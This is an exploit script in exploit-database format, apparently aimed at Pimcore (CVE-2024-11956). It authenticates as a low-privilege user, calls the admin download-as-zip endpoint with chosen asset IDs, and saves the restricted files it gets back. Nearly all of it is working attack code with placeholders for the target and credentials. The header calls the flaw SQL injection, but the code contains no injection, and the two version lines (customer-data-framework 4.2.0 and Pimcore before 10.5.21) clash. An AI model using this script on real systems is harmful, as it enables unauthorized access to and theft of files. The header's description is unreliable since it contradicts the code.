# Exploit Title: Pimcore customer-data-framework 4.2.0 -  SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956

import requests

# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"

# Authenticate and get session
session = requests.Session()
login_data = {
    "username": USERNAME,
    "password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)

if "Login successful" in login_response.text:
    print("[+] Authenticated successfully.")

    # Exploit the downloadAsZip functionality
    download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
    payload = {
        "ids[]": ["1", "2", "3"]  # Replace with IDs of restricted files/folders
    }
    download_response = session.post(download_url, data=payload)

    if download_response.status_code == 200:
        print("[+] Exploit successful. Restricted files downloaded.")
        with open("restricted_files.zip", "wb") as f:
            f.write(download_response.content)
    else:
        print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
    print("[-] Authentication failed.")